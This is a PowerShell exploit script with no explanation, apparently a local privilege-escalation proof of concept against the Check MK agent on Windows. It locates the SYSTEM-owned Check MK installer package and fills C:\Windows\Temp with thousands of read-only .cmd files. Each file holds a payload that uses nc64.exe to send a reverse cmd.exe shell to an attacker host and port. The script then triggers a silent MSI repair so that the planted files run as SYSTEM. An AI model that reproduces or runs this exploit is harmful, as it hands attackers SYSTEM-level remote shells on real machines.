param(
    [int]$MinPID = 1000,
    [int]$MaxPID = 10000,
    [string]$LHOST = "10.10.16.10",
    [string]$LPORT = "8888"
)
 
Write-Host "[*] Scanning for Check MK-related MSI files (SYSTEM-owned)..."
try {
    $regPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties"
    
    $checkMsiList = Get-ItemProperty -Path $regPath -ErrorAction Stop |
        Select-Object DisplayName, LocalPackage |
        Where-Object {
            $_.DisplayName -match "Check\s*MK" -and
            $_.LocalPackage -and 
            $_.LocalPackage.EndsWith(".msi") -and 
            (Test-Path $_.LocalPackage)
        }
 
    if (-not $checkMsiList) {
        Write-Host "[!] No Check MK-related MSI files found!" -ForegroundColor Red
        $allMsi = Get-ItemProperty -Path $regPath -ErrorAction SilentlyContinue |
            Select-Object DisplayName, LocalPackage |
            Where-Object { $_.LocalPackage -and $_.LocalPackage.EndsWith(".msi") -and (Test-Path $_.LocalPackage) }
        if ($allMsi) {
            Write-Host "[*] Available MSI files on this machine:" -ForegroundColor Yellow
            $allMsi | ForEach-Object { Write-Host "  - $($_.DisplayName): $($_.LocalPackage)" }
        }
        exit 1
    }
 
    $msi = $checkMsiList[0].LocalPackage
    Write-Host "[*] Successfully found Check MK MSI!" -ForegroundColor Green
    Write-Host "[*] Software Name: $($checkMsiList[0].DisplayName)" -ForegroundColor Green
    Write-Host "[*] MSI Path: $msi" -ForegroundColor Green
}
catch {
    Write-Host "[!] Failed to scan MSI files: $($_.Exception.Message)" -ForegroundColor Red
    exit 1
}
 
$NcPath = "C:\Windows\Temp\nc64.exe"
$BatchPayload = "@echo off`r`n$NcPath -e cmd.exe $LHOST $LPORT"
 
Write-Host "[*] Seeding $MinPID to $MaxPID..."
foreach ($ctr in 0..1) {
    for ($num = $MinPID; $num -le $MaxPID; $num++) {
        $filePath = "C:\Windows\Temp\cmk_all_$($num)_$($ctr).cmd"
        try {
            [System.IO.File]::WriteAllText($filePath, $BatchPayload, [System.Text.Encoding]::ASCII)
            Set-ItemProperty -Path $filePath -Name IsReadOnly -Value $true -ErrorAction SilentlyContinue
        } catch {
        }
    }
}
Write-Host "[*] Seeding complete."
 
Write-Host "[*] Triggering MSI repair for Check MK..."
Start-Process "msiexec.exe" -ArgumentList "/fa `"$msi`" /qn /l*vx C:\Windows\Temp\cmk_repair.log" -Wait
Write-Host "[*] Sucessful!"
